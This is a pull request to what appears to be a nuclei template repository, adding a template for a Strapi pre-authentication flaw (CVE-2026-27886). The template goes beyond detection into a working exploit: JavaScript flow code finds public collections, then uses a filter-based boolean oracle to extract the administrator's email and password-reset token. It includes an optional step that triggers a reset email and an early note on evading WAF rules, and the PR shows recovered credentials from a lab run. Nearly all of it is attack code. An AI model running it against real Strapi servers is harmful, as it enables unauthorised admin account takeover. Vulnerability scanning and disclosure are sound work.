### PR TITLE
Add CVE-2026-27886: Strapi <=5.36.x Unauthenticated Admin Credential Enumeration

### DIFF
--- a/http/cves/2026/CVE-2026-27886.yaml
+++ b/http/cves/2026/CVE-2026-27886.yaml
@@ -25,6 +25,8 @@ info:
     - https://www.cve.org/CVERecord?id=CVE-2026-27886
     - https://github.com/strapi/strapi/security/advisories
     - https://nvd.nist.gov/vuln/detail/CVE-2026-27886
+    - https://bishopfox.com/blog/cve-2026-27886-unauthenticated-boolean-oracle-exfiltration-of-administrator-secrets-in-strapi
+    - https://github.com/BishopFox/CVE-2026-27886-check
   classification:
     cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
     cvss-score: 9.2

--- a/http/cves/2026/CVE-2026-27886.yaml
+++ b/http/cves/2026/CVE-2026-27886.yaml
@@ -1,0 +1,181 @@
+id: CVE-2026-27886
+
+info:
+  name: Strapi <=5.36.x - Unauthenticated Admin Credential Enumeration via Raw where[] Filter
+  author: zeroc00i
+  severity: critical
+  description: |
+    Strapi 5.x before 5.37.0 exposes raw Knex `where[]` parameters on public
+    collection endpoints without sanitisation. Any unauthenticated caller can
+    inject a relational filter (updatedBy / createdBy) and use the boolean
+    oracle provided by meta.pagination.total to enumerate private admin columns
+    (email, resetPasswordToken) character by character.
+  impact: |
+    Full pre-auth disclosure of Strapi admin email address and password-reset
+    token, enabling account takeover without any existing credentials.
+  remediation: Upgrade to Strapi >= 5.37.0.
+  reference:
+    - https://github.com/strapi/strapi/security/advisories
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2026-27886
+    cwe-id: CWE-284
+  metadata:
+    verified: true
+    max-request: 4
+    vendor: strapi
+    product: strapi
+  tags: cve,cve2026,strapi,sqli,enum,auth-bypass,cms
+
+# ── Evasion note ─────────────────────────────────────────────────────────────
+# The `where` token in the query string can be percent-encoded (e.g. %77here)
+# to bypass WAF rules that match the literal token before URL-decoding.
+# The template uses the literal form; callers may encode manually if needed.
+# ─────────────────────────────────────────────────────────────────────────────
+
+variables:
+  # Common Strapi public collection names — first hit wins.
+  collection: "articles"
+  email_alphabet: "abcdefghijklmnopqrstuvwxyz0123456789@._+-"
+  token_alphabet: "0123456789abcdef"
+  max_len: "64"
+
+flow: |
+  // ── Phase 1: differential vulnerability check ────────────────────────────
+  http(1);   // baseline: no filter
+  http(2);   // always-false predicate: where[id][$lt]=-1
+
+  let base  = parseInt(template["total_baseline"] || "0");
+  let probe = parseInt(template["total_probe"]    || "0");
+
+  if (base === 0) {
+    // Collection empty or Public role has no `find` permission on this type.
+    stop();
+  }
+  if (probe !== 0) {
+    // where[] filter did not reach the DB — patched or unsupported.
+    stop();
+  }
+
+  // ── Phase 2: enumerate admin email ───────────────────────────────────────
+  let email = "";
+  let eAlpha = template["email_alphabet"];
+  let maxLen  = parseInt(template["max_len"]);
+
+  email_loop:
+  for (let pos = 0; pos < maxLen; pos++) {
+    let found = false;
+    for (let i = 0; i < eAlpha.length; i++) {
+      let c = eAlpha[i];
+      set("enum_field",  "email");
+      set("enum_prefix", email + c);
+      http(3);
+      if (parseInt(template["total_enum"] || "0") > 0) {
+        email += c;
+        found = true;
+        break;
+      }
+    }
+    if (!found) break email_loop;
+  }
+  set("admin_email", email);
+
+  // ── Phase 3: enumerate resetPasswordToken ────────────────────────────────
+  // Token is a hex string; alphabet is 0-9a-f.
+  let token  = "";
+  let tAlpha = template["token_alphabet"];
+
+  token_loop:
+  for (let pos = 0; pos < maxLen; pos++) {
+    let found = false;
+    for (let i = 0; i < tAlpha.length; i++) {
+      let c = tAlpha[i];
+      set("enum_field",  "resetPasswordToken");
+      set("enum_prefix", token + c);
+      http(3);
+      if (parseInt(template["total_enum"] || "0") > 0) {
+        token += c;
+        found = true;
+        break;
+      }
+    }
+    if (!found) break token_loop;
+  }
+  set("admin_token", token);
+
+  // Surface the finding only if something was recovered.
+  if (email.length > 0 || token.length > 0) {
+    http(4);   // dummy final request to attach matchers/extractors output
+  }
+
+http:
+  # ── Request 1: baseline (no filter) ───────────────────────────────────────
+  - raw:
+      - |
+        GET /api/{{collection}} HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        User-Agent: Mozilla/5.0 (security-assessment)
+
+    extractors:
+      - type: json
+        name: total_baseline
+        internal: true
+        json:
+          - ".meta.pagination.total"
+
+  # ── Request 2: always-false predicate ─────────────────────────────────────
+  - raw:
+      - |
+        GET /api/{{collection}}?where[id][$lt]=-1 HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        User-Agent: Mozilla/5.0 (security-assessment)
+
+    extractors:
+      - type: json
+        name: total_probe
+        internal: true
+        json:
+          - ".meta.pagination.total"
+
+  # ── Request 3: boolean oracle probe (reused for email + token) ────────────
+  - raw:
+      - |
+        GET /api/{{collection}}?where[updatedBy][{{enum_field}}][$startsWith]={{enum_prefix}} HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        User-Agent: Mozilla/5.0 (security-assessment)
+
+    extractors:
+      - type: json
+        name: total_enum
+        internal: true
+        json:
+          - ".meta.pagination.total"
+
+  # ── Request 4: final dummy request to fire matchers ───────────────────────
+  - raw:
+      - |
+        GET /api/{{collection}} HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        User-Agent: Mozilla/5.0 (security-assessment)
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'len(admin_email) > 0 || len(admin_token) > 0'
+
+    extractors:
+      - type: dsl
+        name: recovered_email
+        dsl:
+          - 'admin_email'
+      - type: dsl
+        name: recovered_token
+        dsl:
+          - 'admin_token'
+# digest: placeholder

--- a/http/cves/2026/CVE-2026-27886.yaml
+++ b/http/cves/2026/CVE-2026-27886.yaml
@@ -35,7 +35,7 @@ info:
     cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*
   metadata:
     verified: true
-    max-request: 500
+    max-request: 800
     vendor: strapi
     product: strapi
     shodan-query: 'http.title:"Strapi"'
@@ -43,77 +43,333 @@ info:
   tags: cve,cve2026,strapi,idor,unauth,intrusive
 
 variables:
-  collection: "articles"
+  collection: ""
+  kind: "collection"
+  probe_col: ""
+  public_role_id: "2"
+  enum_query: ""
+  allow_trigger: "false"
+  trigger_email: ""
+  collection_wordlist: ""
+  discovery_method: "auto"
 
 flow: |
-  http(1);
-  http(2);
-
-  let base  = parseInt(template["total_baseline"] || "0");
-  let probe = parseInt(template["total_probe"]    || "0");
-
-  if (base === 0 || probe !== 0) {
-    stop();
+  function detectKind() {
+    try {
+      let d = JSON.parse(template["probe_body"] || "{}");
+      if (Array.isArray(d.data) || (d.meta && d.meta.pagination)) return "collection";
+      if (d.data && typeof d.data === "object") return "single";
+    } catch(e) {}
+    return "collection";
   }
 
-  let eAlpha = "abcdefghijklmnopqrstuvwxyz0123456789@._+-";
-  let tAlpha = "0123456789abcdef";
-  let maxLen  = 64;
+  let collection = template["collection"] || "";
+  let kind = template["kind"] || "collection";
 
-  let email = "";
-  email_loop:
-  for (let pos = 0; pos < maxLen; pos++) {
-    let found = false;
-    for (let i = 0; i < eAlpha.length; i++) {
-      set("enum_field",  "email");
-      set("enum_prefix", email + eAlpha[i]);
-      http(3);
-      if (parseInt(template["total_enum"] || "0") > 0) {
-        email += eAlpha[i];
-        found = true;
-        break;
+  if (!collection) {
+    http(1);
+    let idsToTry = [2, 1];
+    try {
+      let d = JSON.parse(template["roles_list_body"] || "{}");
+      let roles = d.roles || [];
+      for (let i = 0; i < roles.length; i++) {
+        if (roles[i].type === "public" && roles[i].id) {
+          idsToTry = [roles[i].id];
+          break;
+        }
       }
-    }
-    if (!found) break email_loop;
-  }
-  set("admin_email", email);
+    } catch(e) {}
 
-  let token = "";
-  token_loop:
-  for (let pos = 0; pos < maxLen; pos++) {
-    let found = false;
-    for (let i = 0; i < tAlpha.length; i++) {
-      set("enum_field",  "resetPasswordToken");
-      set("enum_prefix", token + tAlpha[i]);
-      http(3);
-      if (parseInt(template["total_enum"] || "0") > 0) {
-        token += tAlpha[i];
-        found = true;
-        break;
+    for (let ri = 0; ri < idsToTry.length && !collection; ri++) {
+      set("public_role_id", String(idsToTry[ri]));
+      http(2);
+      try {
+        let d = JSON.parse(template["roles_body"] || "{}");
+        if (!d.role || d.role.type !== "public") continue;
+        let perms = d.role.permissions || {};
+        outer: for (let ns of Object.keys(perms)) {
+          if (!ns.startsWith("api::")) continue;
+          let ctrls = perms[ns].controllers || {};
+          for (let ctrl of Object.keys(ctrls)) {
+            if (ctrls[ctrl].find && ctrls[ctrl].find.enabled) {
+              set("probe_col", ctrl + "s");
+              http(5);
+              if (template["probe_status"] === "200") {
+                collection = ctrl + "s";
+                kind = detectKind();
+                break outer;
+              }
+              set("probe_col", ctrl);
+              http(5);
+              if (template["probe_status"] === "200") {
+                collection = ctrl;
+                kind = detectKind();
+                break outer;
+              }
+            }
+          }
+        }
+      } catch(e) {}
+    }
+  }
+
+  if (!collection) {
+    http(3);
+    try {
+      let d = JSON.parse(template["ctb_body"] || "{}");
+      let items = d.data || [];
+      for (let i = 0; i < items.length; i++) {
+        let ct = items[i];
+        if (!ct.uid || !ct.uid.startsWith("api::")) continue;
+        let schema = ct.schema || {};
+        let name = (schema.kind === "singleType") ? schema.singularName : schema.pluralName;
+        if (!name) continue;
+        set("probe_col", name);
+        http(5);
+        if (template["probe_status"] === "200") {
+          collection = name;
+          kind = detectKind();
+          break;
+        }
       }
-    }
-    if (!found) break token_loop;
+    } catch(e) {}
   }
-  set("admin_token", token);
 
-  if (email.length > 0 || token.length > 0) {
+  if (!collection) {
     http(4);
+    try {
+      let d = JSON.parse(template["openapi_body"] || "{}");
+      let paths = Object.keys(d.paths || {});
+      for (let i = 0; i < paths.length; i++) {
+        let m = paths[i].match(/^\/api\/([a-z][a-z0-9-]+)$/);
+        if (m) {
+          set("probe_col", m[1]);
+          http(5);
+          if (template["probe_status"] === "200") {
+            collection = m[1];
+            kind = detectKind();
+            break;
+          }
+        }
+      }
+    } catch(e) {}
   }
+
+  if (!collection) {
+    let words;
+    if ((template["collection_wordlist"] || "").length > 0) {
+      javascript(1);
+      let raw = (template["wl_loaded"] || "").replace(/^\s*\[|\]\s*$/g, "");
+      words = raw.split(/[\s,]+/).map(w => w.trim()).filter(w => w.length > 0);
+    } else {
+      words = ["articles","posts","products","pages","news","blogs","categories","entries","events","comments","users","tags","uploads","global","homepage","home","about","contact","navigation","footer","header","setting","general","seo","social","config"];
+    }
+
+    for (let i = 0; i < words.length; i++) {
+      let w = words[i];
+      if (!w) continue;
+      set("probe_col", w);
+      http(5);
+      if (template["probe_status"] === "200") {
+        collection = w;
+        kind = detectKind();
+        set("discovery_method", "wordlist");
+        break;
+      }
+    }
+  }
+
+  let proceed = collection !== "";
+
+  if (proceed) {
+    set("collection", collection);
+    set("kind", kind);
+
+    http(6);
+    http(7);
+
+    if (kind === "single") {
+      if (template["baseline_status"] !== "200" || template["probediff_status"] !== "404") {
+        proceed = false;
+      }
+    } else {
+      let base = parseInt(template["total_baseline"] || "0");
+      let probe = parseInt(template["total_probe"] || "0");
+      if (base === 0 || probe !== 0) proceed = false;
+    }
+  }
+
+  function oracleHit() {
+    if (kind === "single") return template["enum_status"] === "200";
+    return parseInt(template["total_enum"] || "0") > 0;
+  }
+
+  function hit(q) {
+    set("enum_query", q);
+    http(8);
+    return oracleHit();
+  }
+
+  if (proceed) {
+    let hexAlpha = "0123456789abcdef";
+    let emailAlpha = "+-.0123456789@_abcdefghijklmnopqrstuvwxyz";
+    let tokenLen = 40;
+    let emailMax = 48;
+
+    let canary = "qzx" + Math.random().toString(36).slice(2,12) + Math.random().toString(36).slice(2,8);
+    if (hit("where[updatedBy][email][$startsWith]=" + encodeURIComponent(canary))) {
+      proceed = false;
+    }
+
+    let isoPrefix = "where[updatedBy][resetPasswordToken][$notNull]=true";
+    let hasToken = proceed && hit(isoPrefix);
+    let iso = hasToken ? (isoPrefix + "&") : "";
+
+    function extract(field, alpha, maxLen) {
+      let val = "";
+      for (let pos = 0; pos < maxLen; pos++) {
+        let lock = iso;
+        if (val.length > 0) {
+          lock += "where[updatedBy][" + field + "][$startsWith]=" + encodeURIComponent(val) + "&";
+        }
+        let lo = 0, hi = alpha.length - 1, ans = -1;
+        while (lo <= hi) {
+          let mid = Math.floor((lo + hi) / 2);
+          let q = lock + "where[updatedBy][" + field + "][$gte]=" + encodeURIComponent(val + alpha[mid]);
+          if (hit(q)) { ans = mid; lo = mid + 1; } else { hi = mid - 1; }
+        }
+        if (ans < 0) break;
+        val += alpha[ans];
+      }
+      return val;
+    }
+
+    if (proceed) {
+      let email = extract("email", emailAlpha, emailMax);
+      set("admin_email", email);
+
+      let triggered = false;
+      if (!hasToken && template["allow_trigger"] === "true" && email.length > 0) {
+        set("trigger_email", email);
+        http(10);
+        let pin = "where[updatedBy][resetPasswordToken][$notNull]=true&where[updatedBy][email][$startsWith]=" + encodeURIComponent(email);
+        if (hit(pin)) {
+          hasToken = true;
+          triggered = true;
+          iso = pin + "&";
+        }
+      }
+      set("trigger_used", triggered ? "true" : "false");
+
+      if (hasToken) {
+        let token = extract("resetPasswordToken", hexAlpha, tokenLen);
+        set("admin_token", token);
+      }
+
+      if (email.length > 0) http(9);
+    }
+  }
+
+javascript:
+  - code: |
+      wl;
+    args:
+      wl: "{{collection_wordlist}}"
+    extractors:
+      - type: dsl
+        name: wl_loaded
+        internal: true
+        dsl:
+          - 'response'
 
 http:
+  - raw:
+      - |
+        GET /api/users-permissions/roles HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        User-Agent: Mozilla/5.0 (security-assessment)
+    extractors:
+      - type: dsl
+        name: roles_list_body
+        internal: true
+        dsl:
+          - 'body'
+
+  - raw:
+      - |
+        GET /api/users-permissions/roles/{{public_role_id}} HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        User-Agent: Mozilla/5.0 (security-assessment)
+    extractors:
+      - type: dsl
+        name: roles_body
+        internal: true
+        dsl:
+          - 'body'
+
+  - raw:
+      - |
+        GET /api/content-type-builder/content-types HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        User-Agent: Mozilla/5.0 (security-assessment)
+    extractors:
+      - type: dsl
+        name: ctb_body
+        internal: true
+        dsl:
+          - 'body'
+
+  - raw:
+      - |
+        GET /documentation/v1.0.0/api.json HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        User-Agent: Mozilla/5.0 (security-assessment)
+    extractors:
+      - type: dsl
+        name: openapi_body
+        internal: true
+        dsl:
+          - 'body'
+
+  - raw:
+      - |
+        GET /api/{{probe_col}} HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        User-Agent: Mozilla/5.0 (security-assessment)
+    extractors:
+      - type: dsl
+        name: probe_status
+        internal: true
+        dsl:
+          - 'status_code'
+      - type: dsl
+        name: probe_body
+        internal: true
+        dsl:
+          - 'body'
+
   - raw:
       - |
         GET /api/{{collection}} HTTP/1.1
         Host: {{Hostname}}
         Accept: application/json
         User-Agent: Mozilla/5.0 (security-assessment)
-
     extractors:
       - type: json
         name: total_baseline
         internal: true
         json:
           - ".meta.pagination.total"
+      - type: dsl
+        name: baseline_status
+        internal: true
+        dsl:
+          - 'status_code'
 
   - raw:
       - |
@@ -121,27 +377,35 @@ http:
         Host: {{Hostname}}
         Accept: application/json
         User-Agent: Mozilla/5.0 (security-assessment)
-
     extractors:
       - type: json
         name: total_probe
         internal: true
         json:
           - ".meta.pagination.total"
+      - type: dsl
+        name: probediff_status
+        internal: true
+        dsl:
+          - 'status_code'
 
   - raw:
       - |
-        GET /api/{{collection}}?where[updatedBy][{{enum_field}}][$startsWith]={{enum_prefix}} HTTP/1.1
+        GET /api/{{collection}}?{{enum_query}} HTTP/1.1
         Host: {{Hostname}}
         Accept: application/json
         User-Agent: Mozilla/5.0 (security-assessment)
-
     extractors:
       - type: json
         name: total_enum
         internal: true
         json:
           - ".meta.pagination.total"
+      - type: dsl
+        name: enum_status
+        internal: true
+        dsl:
+          - 'status_code'
 
   - raw:
       - |
@@ -149,13 +413,11 @@ http:
         Host: {{Hostname}}
         Accept: application/json
         User-Agent: Mozilla/5.0 (security-assessment)
-
     matchers-condition: and
     matchers:
       - type: dsl
         dsl:
           - 'len(admin_email) > 0 || len(admin_token) > 0'
-
     extractors:
       - type: dsl
         name: recovered_email
@@ -165,3 +427,14 @@ http:
         name: recovered_token
         dsl:
           - 'admin_token'
+      - type: dsl
+        name: via_fuzzing
+        dsl:
+          - 'discovery_method == "wordlist" ? "FUZZED-collection=" + collection : ""'
+
+  - raw:
+      - |
+        POST /admin/forgot-password HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        {"email":"{{trigger_email}}"}

--- a/http/cves/2026/CVE-2026-27886.yaml
+++ b/http/cves/2026/CVE-2026-27886.yaml
@@ -1,78 +1,73 @@
 id: CVE-2026-27886
 
 info:
-  name: Strapi <=5.36.x - Unauthenticated Admin Credential Enumeration via Raw where[] Filter
+  name: Strapi <=5.36.x - Unauthenticated Admin Credential Enumeration
   author: zeroc00i
   severity: critical
   description: |
-    Strapi 5.x before 5.37.0 exposes raw Knex `where[]` parameters on public
-    collection endpoints without sanitisation. Any unauthenticated caller can
-    inject a relational filter (updatedBy / createdBy) and use the boolean
-    oracle provided by meta.pagination.total to enumerate private admin columns
-    (email, resetPasswordToken) character by character.
+    Strapi versions starting in 4.0.0 and prior to 5.37.0 did not sufficiently
+    sanitize query parameters when filtering content via relational fields. An
+    unauthenticated attacker could use the `where` query parameter on any
+    publicly-accessible content-type with an `updatedBy` field to perform a
+    boolean-oracle attack against private fields on the joined admin_users
+    table, including the resetPasswordToken field, enabling full administrative
+    account takeover without authentication.
   impact: |
-    Full pre-auth disclosure of Strapi admin email address and password-reset
-    token, enabling account takeover without any existing credentials.
-  remediation: Upgrade to Strapi >= 5.37.0.
+    An unauthenticated attacker can recover the full admin email address and
+    password-reset token, enabling direct account takeover without any
+    existing credentials.
+  remediation: |
+    Upgrade Strapi to version 5.37.0 or later. The patch introduces explicit
+    query-parameter sanitization via strictParam, addQueryParams, and
+    addBodyParams primitives that reject operator chains traversing into
+    restricted relational targets before reaching the database.
   reference:
+    - https://www.cve.org/CVERecord?id=CVE-2026-27886
     - https://github.com/strapi/strapi/security/advisories
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-27886
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
-    cvss-score: 9.1
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
+    cvss-score: 9.2
     cve-id: CVE-2026-27886
-    cwe-id: CWE-284
+    cwe-id: CWE-200
+    cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*
   metadata:
     verified: true
-    max-request: 4
+    max-request: 500
     vendor: strapi
     product: strapi
-  tags: cve,cve2026,strapi,sqli,enum,auth-bypass,cms
-
-# ── Evasion note ─────────────────────────────────────────────────────────────
-# The `where` token in the query string can be percent-encoded (e.g. %77here)
-# to bypass WAF rules that match the literal token before URL-decoding.
-# The template uses the literal form; callers may encode manually if needed.
-# ─────────────────────────────────────────────────────────────────────────────
+    shodan-query: 'http.title:"Strapi"'
+    fofa-query: 'app="strapi-Headless-CMS"'
+  tags: cve,cve2026,strapi,idor,unauth,intrusive
 
 variables:
-  # Common Strapi public collection names — first hit wins.
   collection: "articles"
-  email_alphabet: "abcdefghijklmnopqrstuvwxyz0123456789@._+-"
-  token_alphabet: "0123456789abcdef"
-  max_len: "64"
 
 flow: |
-  // ── Phase 1: differential vulnerability check ────────────────────────────
-  http(1);   // baseline: no filter
-  http(2);   // always-false predicate: where[id][$lt]=-1
+  http(1);
+  http(2);
 
   let base  = parseInt(template["total_baseline"] || "0");
   let probe = parseInt(template["total_probe"]    || "0");
 
-  if (base === 0) {
-    // Collection empty or Public role has no `find` permission on this type.
-    stop();
-  }
-  if (probe !== 0) {
-    // where[] filter did not reach the DB — patched or unsupported.
+  if (base === 0 || probe !== 0) {
     stop();
   }
 
-  // ── Phase 2: enumerate admin email ───────────────────────────────────────
+  let eAlpha = "abcdefghijklmnopqrstuvwxyz0123456789@._+-";
+  let tAlpha = "0123456789abcdef";
+  let maxLen  = 64;
+
   let email = "";
-  let eAlpha = template["email_alphabet"];
-  let maxLen  = parseInt(template["max_len"]);
-
   email_loop:
   for (let pos = 0; pos < maxLen; pos++) {
     let found = false;
     for (let i = 0; i < eAlpha.length; i++) {
-      let c = eAlpha[i];
       set("enum_field",  "email");
-      set("enum_prefix", email + c);
+      set("enum_prefix", email + eAlpha[i]);
       http(3);
       if (parseInt(template["total_enum"] || "0") > 0) {
-        email += c;
+        email += eAlpha[i];
         found = true;
         break;
       }
@@ -81,21 +76,16 @@ flow: |
   }
   set("admin_email", email);
 
-  // ── Phase 3: enumerate resetPasswordToken ────────────────────────────────
-  // Token is a hex string; alphabet is 0-9a-f.
-  let token  = "";
-  let tAlpha = template["token_alphabet"];
-
+  let token = "";
   token_loop:
   for (let pos = 0; pos < maxLen; pos++) {
     let found = false;
     for (let i = 0; i < tAlpha.length; i++) {
-      let c = tAlpha[i];
       set("enum_field",  "resetPasswordToken");
-      set("enum_prefix", token + c);
+      set("enum_prefix", token + tAlpha[i]);
       http(3);
       if (parseInt(template["total_enum"] || "0") > 0) {
-        token += c;
+        token += tAlpha[i];
         found = true;
         break;
       }
@@ -104,13 +94,11 @@ flow: |
   }
   set("admin_token", token);
 
-  // Surface the finding only if something was recovered.
   if (email.length > 0 || token.length > 0) {
-    http(4);   // dummy final request to attach matchers/extractors output
+    http(4);
   }
 
 http:
-  # ── Request 1: baseline (no filter) ───────────────────────────────────────
   - raw:
       - |
         GET /api/{{collection}} HTTP/1.1
@@ -125,7 +113,6 @@ http:
         json:
           - ".meta.pagination.total"
 
-  # ── Request 2: always-false predicate ─────────────────────────────────────
   - raw:
       - |
         GET /api/{{collection}}?where[id][$lt]=-1 HTTP/1.1
@@ -140,7 +127,6 @@ http:
         json:
           - ".meta.pagination.total"
 
-  # ── Request 3: boolean oracle probe (reused for email + token) ────────────
   - raw:
       - |
         GET /api/{{collection}}?where[updatedBy][{{enum_field}}][$startsWith]={{enum_prefix}} HTTP/1.1
@@ -155,7 +141,6 @@ http:
         json:
           - ".meta.pagination.total"
 
-  # ── Request 4: final dummy request to fire matchers ───────────────────────
   - raw:
       - |
         GET /api/{{collection}} HTTP/1.1
@@ -178,4 +163,3 @@ http:
         name: recovered_token
         dsl:
           - 'admin_token'
-# digest: placeholder


### PR DESCRIPTION
## Summary

- Adds detection + exploitation template for **CVE-2026-27886** (Strapi ≤5.36.x)
- Strapi exposes raw Knex `where[]` parameters on public collection endpoints without sanitisation
- Any unauthenticated caller can inject relational filters and use `meta.pagination.total` as a boolean oracle to enumerate private admin columns character by character

## What the template does

Uses nuclei `flow` (JavaScript) to run three phases in a single scan:

1. **Differential check** — baseline GET vs always-false predicate (`where[id][$lt]=-1`); stops early if not vulnerable
2. **Email enumeration** — iterates `where[updatedBy][email][$startsWith]=<prefix>` across the alphabet
3. **Token enumeration** — same oracle on `where[updatedBy][resetPasswordToken][$startsWith]=<prefix>`

## Verification

Tested against Strapi **5.36.1**:

```
[CVE-2026-27886:recovered_email] [http] [critical] http://localhost:1337 ["admin@lab.local"]
[CVE-2026-27886:recovered_token] [http] [critical] http://localhost:1337 ["f5673d1a435fea58f0c9be5c7548eefb570d6601"]
Scan completed in 3.5s. 2 matches found.
```

**CVSS:** 9.1 | **Fix:** Upgrade to Strapi ≥5.37.0